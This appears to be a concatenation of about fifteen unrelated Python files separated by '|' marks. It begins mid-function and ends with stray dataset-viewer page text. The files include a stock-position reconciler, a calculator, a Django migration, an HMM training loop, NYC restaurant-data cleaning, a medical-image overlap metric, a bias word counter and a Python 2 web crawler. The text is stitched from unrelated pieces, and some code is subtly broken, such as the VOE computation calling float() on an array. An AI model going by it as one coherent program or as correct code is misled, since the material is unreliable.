self.board.new_turn(my_turn_row, my_turn_col, self.sign)
return my_turn_row, my_turn_col
|
import argparse
from pathlib import Path
def main(filepath):
with open(filepath, "r") as file1:
positions = {}
transactions = {}
day = ""
section = ""
while True:
line = file1.readline()
if not line:
break
elif line.strip() == "":
continue
if "-POS" in line or "-TRN" in line:
section = line.split("-")[1].strip()
day = str(line.split("-")[0].split("D")[1])
elif section == "POS":
if day not in positions:
positions[day] = {}
symbol = line.split()[0]
shares = float(line.split()[1])
positions[day][symbol] = shares
elif section == "TRN":
if day not in transactions:
transactions[day] = []
transactions[day].append(line.split())
update_activity(positions, transactions)
def update_activity(positions, transactions):
positions_copy = {}
for day in transactions:
previous_day = str(int(day) - 1)
positions_copy[day] = positions[previous_day].copy()
for trans in transactions[day]:
position_day = positions_copy[day]
symbol = trans[0]
action = trans[1]
shares = float(trans[2])
value = float(trans[3])
if symbol != "Cash":
if symbol not in position_day:
position_day[symbol] = 0
if action == "SELL":
position_day[symbol] -= shares
position_day["Cash"] += value
if position_day[symbol] == 0:
del position_day[symbol]
elif action == "BUY":
position_day[symbol] += shares
position_day["Cash"] -= value
elif action == "DIVIDEND":
position_day["Cash"] += value
else:
if symbol not in position_day:
position_day["Cash"] = 0
if action == "DEPOSIT":
position_day["Cash"] += value
elif action == "FEE":
position_day["Cash"] -= value
reconcile(positions, positions_copy)
def reconcile(positions, positions_copy):
diff = {}
for day in positions_copy:
copy_day = positions_copy[day]
for symbol in copy_day:
original_day = positions[day]
if symbol not in original_day:
diff[symbol] = format_number(0 - copy_day[symbol])
elif copy_day[symbol] != original_day[symbol]:
difference = original_day[symbol] - copy_day[symbol]
diff[symbol] = format_number(difference)
for symbol in original_day:
if symbol not in copy_day:
diff[symbol] = format_number(original_day[symbol])
elif copy_day[symbol] != original_day[symbol]:
difference = format_number(original_day[symbol] - copy_day[symbol])
diff[symbol] = format_number(difference)
write_output(diff)
def write_output(diff):
with open("recon.out", "w") as output_file:
header = "---------\n"
lines = ""
for symbol in diff:
lines += symbol + " " + str(diff[symbol]) + "\n"
output_file.write(header + lines)
def format_number(num):
return int(num) if float(num).is_integer() else num
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("file_path", type=Path)
p = parser.parse_args()
if p.file_path.exists():
main(p.file_path)
|
"""def calculator(num1,operation,num2):
if (operation == "+"):
print (num1 + num2)
elif (operation == "-"):
print (num1 - num2)
elif (operation == "*"):
print (num1 * num2)
elif (operation == "/"):
print (num1 / num2)
else:
print("not a valid operation")
calculator(11,"*",9)"""
def add(num1, num2):
print (int(num1) + int(num2))
def subtract(num1, num2):
print (int(num1)-int(num2))
def multiply(num1, num2):
print(int(num1)*int(num2))
def divide(num1, num2):
print(int(num1)/int(num2))
def calculator():
check = False
while(check == False):
try:
num1 = int(input("first num: "))
num2 = int(input("second num: "))
op = input("put operation: ")
check = True
except:
check = False
print('needs to be a number')
if (op == "+"):
add(num1, num2)
elif (op == "-"):
subtract(num1, num2)
elif (op == "*"):
multiply(num1, num2)
elif (op == "/"):
divide(num1,num2)
else:
print("not a valid operation")
return
calculator()
|
# Generated by Django 3.1 on 2020-10-16 06:58
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Announcement',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('author', models.CharField(max_length=16, verbose_name='发布人')),
('title', models.TextField(max_length=100, verbose_name='标题')),
('content', models.TextField(max_length=800, verbose_name='内容')),
('require_upload', models.BooleanField(default=False, verbose_name='需要上传')),
('issue_datetime', models.DateTimeField(auto_now_add=True, verbose_name='发布时间')),
('edit_datetime', models.DateTimeField(auto_now=True, verbose_name='最新修改时间')),
('deadline', models.DateTimeField(blank=True, verbose_name='截止时间')),
('url_address', models.TextField(blank=True, max_length=200, verbose_name='转发路径')),
('active', models.BooleanField(default=True, verbose_name='启用')),
('team_id', models.CharField(max_length=32, null=True, verbose_name='团队id')),
],
options={
'verbose_name': '公告',
'verbose_name_plural': '公告',
},
),
migrations.CreateModel(
name='AnnouncementRecord',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('aid', models.IntegerField(verbose_name='通知id')),
('reader', models.CharField(max_length=16, verbose_name='阅读人')),
('image', models.ImageField(blank=True, upload_to='image', verbose_name='图片')),
('read_datetime', models.DateTimeField(auto_now=True, verbose_name='确认时间')),
('read_status', models.CharField(max_length=10, verbose_name='阅读状态')),
('team_id', models.CharField(max_length=32, null=True, verbose_name='团队id')),
],
options={
'verbose_name': '公告确认明细',
'verbose_name_plural': '公告确认明细',
},
),
migrations.CreateModel(
name='Feedback',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('aid', models.IntegerField(verbose_name='通知id')),
('sender', models.CharField(max_length=16, verbose_name='发送人')),
('sent_datetime', models.DateTimeField(auto_now=True, verbose_name='发送时间')),
('comment', models.TextField(max_length=100, verbose_name='内容')),
('reply_to', models.IntegerField(null=True, verbose_name='回复id')),
('team_id', models.CharField(max_length=32, null=True, verbose_name='团队id')),
],
options={
'verbose_name': '留言',
'verbose_name_plural': '留言',
},
),
]
|
import pandas as pd
import numpy as np
df1 = pd.read_csv('../../data/Datasets/best_film_consolidated.csv')
df2 = pd.read_csv('../../data/Datasets/best_director_consolidated.csv')
df3 = pd.read_csv('../../data/Datasets/best_actor_consolidated.csv')
df4 = pd.read_csv('../../data/Datasets/best_actress_consolidated.csv')
on = ['Name', 'Year']
df = df1.merge(df2, how='outer', left_on=on, right_on=on)
df = df.merge(df3, how='outer', left_on=on, right_on=on)
df = df.merge(df4, how='outer', left_on=on, right_on=on)
df.fillna(0)
df.drop_duplicates().to_csv('../../data/Datasets/consolidated.csv', index=False)
df[on].drop_duplicates().to_csv('../../data/Datasets/name_and_year.csv', index=False)
|
from model.registry import Registry
from model.connection.connection import Connection
from model.laboralinsertion.inscription import Inscription
from model.users.users import User, UserDAO
import model.laboralinsertion.user
from model.files.files import File
import PyPDF2
import base64
import inject
import logging
from io import BytesIO
if __name__ == '__main__':
logging.getLogger().setLevel(logging.WARNING)
#inject.configure()
conn = Connection(inject.instance(Registry).getRegistry('dcsys'))
con = conn.get()
try:
uids = set([ i.userId for i in Inscription.findById(con, Inscription.findAll(con)) ])
for i in uids:
logging.warn('chequeando cv de : {}'.format(i))
usr = UserDAO.findById(con, [i])[0]
cvi = model.laboralinsertion.user.User.findById(con, i)[0].cv
try:
content = base64.b64decode(File.getContentById(con, cvi))
fn = '/tmp/insercion/{}_{}_{}.pdf'.format(usr.dni, usr.id, cvi)
with open(fn, 'wb') as f:
f.write(content)
with BytesIO(content) as buff:
try:
logging.warn('comenzando a leer el pdf')
PyPDF2.PdfFileReader(buff)
logging.warn('{} {} {} {} ok'.format(usr.dni, usr.name, usr.lastname, cvi))
import os
os.remove(fn)
except PyPDF2.utils.PdfReadError:
logging.warn('El usuario {} {} {} {} tiene el cv {} sin formato pdf'.format(i, usr.dni, usr.name, usr.lastname, cvi))
except Exception as e:
logging.warn('El usuario {} {} {} {} tiene error en el cv {}'.format(i, usr.dni, usr.name, usr.lastname, cvi))
finally:
conn.put(con)
|
import numpy as np
import expectation
import maximization
import aux_functions
import matplotlib.pyplot as plt
def EM_algorithm(X,pi,A,B,N,max_it,ini):
iter = 0
converged = False
Q = []
K = np.shape(pi)[0]
T = np.shape(X[0][0])[1]
epsilon = 1e-2
alpha = np.zeros((N,K,T)) # one alpha for each sequence
beta = np.zeros((N,K,T)) # one beta for each sequence
gamma = np.zeros((N,K,T)) # one gamma for each sequence
chi = np.zeros((N,T,K,K)) # one chi for each sequence
pb = np.zeros((N,K,T))
while iter!=max_it :
if iter == max_it:
print('---------Max iteration reached--------')
break
#print('--------- ITERATION ---> '+str(iter))
# bucle por secuencia
for seq in range(N):
pb[seq,:,:] = aux_functions.calculate_pb(X[seq][0],B,K)
[alpha[seq,:,:], beta[seq,:,:] ,gamma[seq,:,:], chi[seq,:,:,:] ] = expectation.expectation(X[seq][0],pi,A,pb[seq])
[pi_est,A_est,B_est] = maximization.maximization(X , gamma, chi)
pi = pi_est
A = A_est
B = B_est
Q.append(aux_functions.calculate_cost(X,pi_est,A_est,B_est,gamma,chi))
print('Cost at iteration ' +str(iter)+': '+ str(Q[iter]) )
if iter==0:
iter += 1
else:
if (np.abs(Q[iter] - Q[iter-1]) < epsilon) or (iter==max_it-1 ):
print('Convergence reached at iteration ' + str(iter))
plt.plot(Q)
plt.xlabel('Iterations')
plt.ylabel('Log-likelihood')
plt.savefig('Plot_K_' + str(K)+'_ini_'+str(ini))
plt.show()
return [pi_est, A_est, B_est, gamma, Q ,Q[iter], pb]
else:
iter += 1
|
'''
Created on Nov 30, 2015
@author: Benjamin Jakubowski (buj201)
'''
import pandas as pd
def get_raw_data():
url = 'https://data.cityofnewyork.us/api/views/xx67-kt59/rows.csv?accessType=DOWNLOAD'
return pd.read_csv(url, usecols=['CAMIS','BORO', 'GRADE', 'GRADE DATE'],parse_dates=['GRADE DATE'])
def clean_GRADE(df):
'''
From NYC Open Data: allowed values of GRADE are:
-N = Not Yet Graded
-A = Grade A
-B = Grade B
-C = Grade C
-Z = Grade pending
-P = Grade pending issued on re-opening following
in an initial inspection that resulted in a closure.
Note grades N, Z, and P are essentially unlabeled, and as such can be excluded
from our analysis.
'''
allowed_grades = ['A','B','C']
mask = (df.GRADE.isin(allowed_grades))
df = df.loc[mask,:]
return df
def clean_BORO(df):
allowed_boro = ['BROOKLYN', 'BRONX', 'MANHATTAN', 'QUEENS', 'STATEN ISLAND']
mask = (df.BORO.isin(allowed_boro))
df = df.loc[mask,:]
return df
def clean_GRADE_DATE(df):
'''Cleans GRADE DATE column- note valid values are datetimes, and
invalid values are NaT (not a time). Returns all records with
datetime entries for GRADE DATE'''
df.dropna(axis=0, subset=['GRADE DATE'], inplace=True)
return df
def clean_and_save_restaurant_data():
'''Cleans a saves the restaurant grade data from NYC Open data. Saves cleaned data
in a csv file in the 'data' directory.'''
rest_data = get_raw_data()
rest_data = clean_GRADE(rest_data)
rest_data = clean_BORO(rest_data)
rest_data = clean_GRADE_DATE(rest_data)
rest_data.drop_duplicates(inplace=True) ##Needed since grades entered multiple times on same date
rest_data.to_csv('data/clean_restaurant_grades.csv')
return
|
import numpy as np
import SimpleITK as sitk
import itk
import SimpleITK as sitk
import pandas as pd
import quandl, math
import numpy as np
from sklearn import preprocessing, svm
from sklearn.model_selection._validation import cross_validate
from sklearn.linear_model import LinearRegression
from sklearn.metrics import jaccard_similarity_score
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.metrics import f1_score
from sklearn.metrics import cohen_kappa_score
from sklearn.metrics import roc_auc_score
from sklearn.metrics import confusion_matrix
from sklearn.metrics import jaccard_similarity_score
#from load_data import loadDataGeneral
import nibabel as nib
from keras.models import load_model
from scipy.misc import imresize
from skimage.color import hsv2rgb, rgb2hsv, gray2rgb
from skimage import io, exposure
import SimpleITK as sitk
#from sklearn.metrics import Dice
import cv2
import sys
#y_true = sitk.ReadImage("C:/Users/lenovo/Desktop/safa/driveknee/drive-download-20190515T061013Z-001/IBSR_13/IBSR_13_segTRI_ana.nii")
#y_pred = sitk.ReadImage("C:/Users/lenovo/Desktop/safa/driveknee/drive-download-20190515T061013Z-001/IBSR_13/IBSR_13_segTRI_predict.nii")
def voe(y_true, y_pred):
y_true.dtype == bool and y_pred.dtype == bool
y_true_f = y_true.flatten()
y_pred_f = y_pred.flatten()
return (100 * (1. - np.logical_and(y_true_f, y_pred_f).sum() / float(np.logical_or(y_true_f, y_pred_f))))
#vd = (100 * (y_true_f.sum() - y_pred_f.sum()) / float(y_pred_f.sum()))
y_true = sitk.ReadImage("IBSR_11_segTRI_ana.nii")
y_pred = sitk.ReadImage("IBSR_11_segTRI_predict.nii")
print("img true")
print (y_true)
print("img predict")
print (y_pred)
#t1 = np.array(y_true)
#p1 = np.array(y_pred)
t1 = sitk.GetArrayViewFromImage(y_true)
p1 = sitk.GetArrayViewFromImage(y_pred)
print("hhhhhhhhiiiiiiiiiiiiiiiiihh")
print("img true_array")
print (t1)
print("img predict_array")
print (p1)
#t1 = y_true.flatten(t)
#p1 = y_pred.flatten(p)
t1 = t1.astype(int)
p1= p1.astype(int)
print("hhhhhhhhiiiiiiiiiiiiiiiiihhhhhhhhhhhhhhhhhhhhhhhh")
#intersection = np.logical_and(y_true, y_pred).sum()
#union = np.logical_or(y_true, y_pred).sum()
#(2. * intersection + 1.) / (y_true.sum() + y_pred.sum() + 1.)
#voe = 100 * (1. - intersection / union)
#vd = 100 * (((y_true).sum() - (y_pred).sum()) / (y_pred).sum())
voe = (100 * (1. - np.logical_and(t1, p1).sum() / float(np.logical_or(t1, p1))))
vd = (100 * (t1.sum() - p1.sum()) / float(p1.sum()))
#voe1 = voe(t1,p1)
print("VOE" , voe)
print("VD" , vd)
|
"""
@author: Eduardo Alvear
"""
def punto1(carros):
c_amarillo = 0
c_rosa = 0
c_roja = 0
c_verde = 0
c_azul = 0
for auto in carros:
if auto == 1 or auto == 2:
c_amarillo += 1
elif auto == 3 or auto == 4:
c_rosa += 1
elif auto == 5 or auto == 6:
c_roja += 1
elif auto == 7 or auto == 8:
c_verde += 1
elif auto == 9 or auto == 0:
c_azul += 1
return {
"Autos amarillos": c_amarillo,
"Autos rosa": c_rosa,
"Autos rojos": c_roja,
"Autos verdes": c_verde,
"Autos azules": c_azul
}
|
# use_module.py
from python单例模式.use_module import singleton as s1
from python单例模式.use_module import singleton as s2
print(s1, id(s1))
print(s2, id(s2))
"""
多次导入该实例,其实调用的是一个地址
"""
|
"""
Author: Catherine DeJager (cmd16 on GitHub)
Written for https://github.com/molliem/gender-bias
Detects gender bias in letters of recommendation by searching usage of words that denote effort vs words that denote accomplishment.
"""
import argparse
import nltk
# Create an argument parser and tell it about arguments
parser = argparse.ArgumentParser(description='Look for words that denote effort.')
# positional argument for input file
parser.add_argument(
'-f', '--file', metavar="<file name>",
help='name of input file',)
# optional argument for effort words file
parser.add_argument(
'-e', '--effort_file', dest='effort_file', default="effort_words.wordlist",
metavar="<effort file>",
help='name of file containing effort words')
# optional argument for accomplishment words file
parser.add_argument(
'-a', '--accomplishment_file', dest='accomplishment_file', default="accomplishment_words.wordlist",
metavar="<accomplishment file>",
help='name of file containing accomplishment words')
args = parser.parse_args()
# get the effort words
f_in = open(args.effort_file)
effort_words = f_in.readlines()
f_in.close()
# get the accomplishment words
f_in = open(args.accomplishment_file)
accomplishment_words = f_in.readlines()
f_in.close()
# get the letter's contents
f_in = open(args.file)
contents = f_in.read()
f_in.close()
effort_freqdist = nltk.FreqDist()
accomplishment_freqdist = nltk.FreqDist()
# Note: multi-word phrases are not detected this way (by using word_tokenize).
# TODO: create an option to search the raw text with regular expressions
# count the effort and accomplishment words
for word in nltk.word_tokenize(contents):
if word in effort_words:
effort_freqdist[word] += 1
if word in accomplishment_words: # the two lists should be mutually exclusive, but the user may not abide by that rule
accomplishment_freqdist[word] += 1
# print the results
print("Effort words (and their frequencies:")
for word in effort_freqdist.most_common(): # sorts the words from most to least common
print("%s\t%d" % (word, effort_freqdist[word]))
print("Accomplishment words (and their frequencies:")
for word in accomplishment_freqdist.most_common(): # sorts the words from most to least common
print("%s\t%d" % (word, accomplishment_freqdist[word]))
|
# TODO: Rewrite variance to not need this extension
|
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.const import CONF_ID
AUTO_LOAD = ['sensor','text_sensor', 'binary_sensor']
MULTI_CONF = True
CONF_HUB_ID = 'empty_sensor_hub_id'
empty_sensor_hub_ns = cg.esphome_ns.namespace('empty_sensor_hub')
EmptySensorHub = empty_sensor_hub_ns.class_('EmptySensorHub', cg.Component)
CONFIG_SCHEMA = cv.Schema({
cv.GenerateID(): cv.declare_id(EmptySensorHub),
}).extend(cv.COMPONENT_SCHEMA)
def to_code(config):
var = cg.new_Pvariable(config[CONF_ID])
yield cg.register_component(var, config)
|
import urllib2, httplib
from BeautifulSoup import BeautifulSoup, SoupStrainer
import Queue
import re
import socket
import threading
import time
import functools
import cookielib
from django.utils.encoding import force_unicode
from django.utils import importlib
from django.conf import settings
def get_backend(**kwargs):
"""
Returns an instance of the backend interface specified in settings.
Passes kwargs to the backend's init.
"""
backend_path = settings.MAGELLAN_SEARCH_BACKEND
if not backend_path.startswith('magellan.backends.'):
backend_path = "magellan.backends.%s" % backend_path
backend_class = import_class(backend_path)
return backend_class(**kwargs) #todo: snag options from settings and pass them in as kwargs
class UnfetchableURLException(Exception):
pass
class OffsiteLinkException(Exception):
pass
class CannotHandleUrlException(Exception):
pass
def import_class(path):
"""
Probably a duplicate of some functionality I can't find.
Ganked from haystack's code.
Given a string denoting a path to a class, return the class itself.
"""
path_bits = path.split('.')
# Cut off the class name at the end.
class_name = path_bits.pop()
module_path = '.'.join(path_bits)
module_itself = importlib.import_module(module_path)
if not hasattr(module_itself, class_name):
raise ImportError("The Python module '%s' has no '%s' class." % (module_path, class_name))
return getattr(module_itself, class_name)
class memoize(object):
"""Decorator that caches a function's return value each time it is called.
If called later with the same arguments, the cached value is returned, and
not re-evaluated.
"""
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args):
try:
return self.cache[args]
except KeyError:
value = self.func(*args)
self.cache[args] = value
return value
except TypeError:
# uncachable -- for instance, passing a list as an argument.
# Better to not cache than to blow up entirely.
return self.func(*args)
def __repr__(self):
"""Return the function's docstring."""
return self.func.__doc__
def __get__(self, obj, objtype):
"""Support instance methods."""
return functools.partial(self.__call__, obj)
STORE_CONTENT = getattr(settings, 'SPIDER_STORE_CONTENT', True)
domain_re = re.compile('(([a-z]+://)[^/\?]+)*')
subdomain_re = re.compile('([a-z]+://)(.*?\.)+([^\/\?]+\.[^\/\?\.]+([\/\?].*)?)')
def get_domain(url):
match = re.search(domain_re, url)
if match:
return match.group()
return ''
def get_host(url):
domain = get_domain(url)
if domain:
return domain.split('://')[1]
return ''
def relative_to_full(example_url, url):
"""
Given a url which may or may not be a relative url, convert it to a full
url path given another full url as an example
"""
# remove any hashes
url = re.sub('(#[^\/]+)', '', url)
# does this url specify a protocol? if so, it's already a full url
if re.match('[a-z]+:\/\/', url):
return url
# if the url doesn't start with a slash it's probably relative to the
# current url, so join them and return
if not url.startswith('/'):
# check to see if there is a slash after the protocol -- we'll use the
# slash to determine the current working directory for this relative url
if re.match('^[a-z]+:\/\/(.+?)\/', example_url):
return '/'.join((example_url.rpartition('/')[0], url))
# it starts with a slash, so join it with the domain if possible
domain = get_domain(example_url)
if domain:
return '/'.join((domain, url.lstrip('/')))
return url
def strip_subdomain(url):
match = subdomain_re.search(url)
if match:
return subdomain_re.sub('\\1\\3', url)
return url
@memoize
def is_on_site(source_url, url, domain_substring=None):
if url.startswith('/'):
return True
if '://' not in url:
if url.startswith('mailto') or url.startswith('javascript'):
return False
return True
if domain_substring and domain_substring not in url:
return False
source_domain = get_domain(source_url)
if not source_domain:
raise ValueError('%s must contain "protocol://host"' % source_url)
domain = get_domain(url)
if domain and domain == source_domain:
return True
# try stripping out any subdomains
if domain and strip_subdomain(domain) == strip_subdomain(source_domain):
return True
return False
#def fetch_url(url, timeout):
# f = urllib2.urlopen(url, timeout=timeout)
# res = f.read()
# f.close()
# return res
def ascii_hammer(content):
return ''.join([c for c in content if ord(c) < 128])
class SpiderThread(threading.Thread):
def __init__(self, url_queue, response_queue, finish_event, spider_profile):
threading.Thread.__init__(self)
self.url_queue = url_queue
self.response_queue = response_queue
self.finish_event = finish_event
# load data from the session obj passed in
self.source_url = spider_profile.base_url
self.timeout = spider_profile.timeout
self.profile = spider_profile
self.extractor_class = self.profile.get_extractor_class()
self.headers = {}
self.cookiejar = cookielib.CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))
#urllib2.install_opener(self.opener)
self.working = False
def run(self):
if self.profile.login_url:
self.login()
while not self.finish_event.is_set():
self.process_queue()
if self.profile.delay:
time.sleep(self.profile.delay)
def login(self):
#log in
print "Logging in at", self.profile.login_url, "..."
request = urllib2.Request(url=self.profile.login_url,
data=self.profile.login_details,
headers={})
response = self.opener.open(request)
def process_queue(self):
try:
self.working = True
url, source, depth = self.url_queue.get_nowait()
except Queue.Empty:
self.working = False
time.sleep(1)
except KeyboardInterrupt:
self.working = False
return
else:
try:
crawl_start = time.time()
headers, content, urls = self.crawl(self.source_url, url, self.timeout)
response_time = time.time() - crawl_start
except (UnfetchableURLException, OffsiteLinkException, AttributeError, CannotHandleUrlException, httplib.BadStatusLine):
pass
else:
if self.profile.logged_out_string and self.profile.logged_out_string in force_unicode(content, errors='ignore'):
self.login()
self.url_queue.put((url, source, depth))
self.working = False
return
if 'content-length' not in headers:
headers['content-length'] = len(content)
if 'status' not in headers:
headers['status'] = '200' # ugh. how to get status from urllib2 in crawl()?
if not STORE_CONTENT:
content = ''
results = dict(
url=url,
source_url=source,
content=content,
response_status=int(headers['status']),
response_time=response_time,
content_length=int(headers['content-length']),
headers=headers,
)
self.response_queue.put((results, urls, depth), block=True)
self.url_queue.task_done()
def fetch_url(self, url, timeout):
request = urllib2.Request(url=url,
headers=self.headers)
return self.opener.open(request, timeout=timeout)
def crawl(self, source_url, url, timeout, log=True):
try:
if log:
print "Going to url: %s" % url
if not self.extractor_class.can_handle_url(url, self.opener):
raise CannotHandleUrlException
response = self.fetch_url(url, timeout)
headers_raw = response.info().headers
headers = {}
for header in headers_raw:
(k, s, v) = header.partition(":")
headers[k] = v.strip()
content = response.read()
except socket.error:
raise UnfetchableURLException
except urllib2.URLError:
raise UnfetchableURLException # should be other error
if is_on_site(source_url, response.geturl()):
urls = self.extractor_class.get_urls(content)
return headers, content, self.filter_urls(url, urls)
else:
raise OffsiteLinkException
return headers, content, []
def filter_urls(self, source, urls):
ret = []
for url in urls:
if self.profile.links_ignore_regex and re.search(self.profile.links_ignore_regex, url):
continue
if is_on_site(source, url, self.profile.domain):
ret.append(relative_to_full(source, url))
return ret
|
#!/usr/bin/env python
#----------------------------------------------------------------------------
# ABOUT THE SCRIPT:
# This script can be used to obtain a list of Pfam IDs and corresponding
# Ensembl protein IDs from the Human Genes (GRCh38.p13) dataset from BioMart.
#----------------------------------------------------------------------------
import pandas
from pybiomart import Dataset
# Define which dataset should be queried.
dataset = Dataset(name='hsapiens_gene_ensembl',
host='http://www.ensembl.org')
# Obtain data frame containing the relevant data.
df = dataset.query(attributes=['pfam','ensembl_peptide_id'], only_unique=False)
# Convert the data frame to a list and print it.
results = df.to_csv(index=False, sep='\t')
print(results)
|
import pyvan
OPTIONS = {
"main_file_name": "final.py",
"show_console": True,
"use_existing_requirements": True,
"extra_pip_install_args": [],
"use_pipreqs": False,
"install_only_these_modules": [],
"exclude_modules": [],
"include_modules": [],
"path_to_get_pip_and_python_embedded_zip": "",
"build_dir": "dist",
"pydist_sub_dir": "pydist",
"source_sub_dir": "",
}
pyvan.build(**OPTIONS)
|
#!/usr/local/bin/python3.8
# String are immutable i.e. they cannot be changed
print(id('key')) # e.g. 139912821647280
print(id('keys')) # e.g. 139912821775856
print ( id('key') == id('keys') ) # False
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.